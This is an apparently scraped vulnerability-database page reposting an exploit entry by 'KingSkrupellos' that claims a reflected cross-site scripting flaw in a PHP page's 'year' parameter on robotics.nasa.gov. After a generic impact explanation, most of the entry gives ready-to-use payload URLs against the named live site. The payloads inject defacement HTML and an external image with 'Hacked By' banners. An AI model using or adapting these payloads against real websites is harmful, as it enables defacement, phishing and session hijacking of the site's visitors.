National Aeronautics and Space Administration Robotics Alliance Project Reflected XSS Cross Site Scripting - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1708140 漏洞类型
发布时间 2019-08-20 更新时间 2019-08-20
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019080082
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###################################################################

# Exploit Title : National Aeronautics and Space Administration Robotics Alliance Project Reflected XSS Cross Site Scripting
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/08/2019
# Vendor Homepage : robotics.nasa.gov
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-79 [ Improper Neutralization of Input 
During Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Link : cxsecurity.com/ascii/WLB-2019010038

###################################################################

Impact - Reflected XSS Cross Site Scripting (or Non-Persistent) :
*********************************************************
The server reads data directly from the HTTP request and reflects it back in the 
HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply 
dangerous content to a vulnerable web application, which is then reflected back to the victim
 and executed by the web browser. The most common mechanism for delivering malicious 
content is to include it as a parameter in a URL that is posted publicly or e-mailed directly 
to the victim. URLs constructed in this manner constitute the core of many phishing 
schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. 
After the site reflects the attacker's content back to the victim,the content is 
executed by the victim's browser. A successful exploit could allow the attacker
to execute arbitrary script code in the context of the affected site
and allow the attacker to access sensitive browser-based information.
An attacker, for example,can exploit this vulnerability to steal cookies from
the attacked user in order to hijack a session and gain access to the system.

###################################################################

# Reflected Cross Site Scripting XSS Exploits and Payloads :
*******************************************************
/first/houseteamlist.php?year=1'<marquee%20><font%20color=
lime%20size=32>XSS-Vulnerability-Discovered-Hacked%20By%20%20KingSkrupellos</font></marquee>

/first/houseteamlist.php?year=<center><img%20src=
"https://www.cyberizm.org/images/logo.png"%20width="500"%20height="500">
</center><font%20color="red"%20size="100px"%20face=
"courier%20new">XSS-Vulnerability-Discovered-ByHacked%20By%20%20KingSkrupellos%85

###################################################################

# Example Vulnerable Sites :
*************************
[+] robotics.nasa.gov/first/houseteamlist.php?year=%3Ccenter%3E%3Cimg%20src=
%22https://www.cyberizm.org/images/logo.png%22%20width=%22500%22%20
height=%22500%22%3E%3C/center%3E%3Cfont%20color=%22red%22%20size=
%22100px%22%20face=%22courier%20new%22%3EHacked%20By%20%20KingSkrupellos%85

[+] robotics.nasa.gov/first/houseteamlist.php?year=1'<marquee%20><font%20color=
lime%20size=32>XSS-Vulnerability-Discovered-Hacked%20By%20%20KingSkrupellos</font></marquee>

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################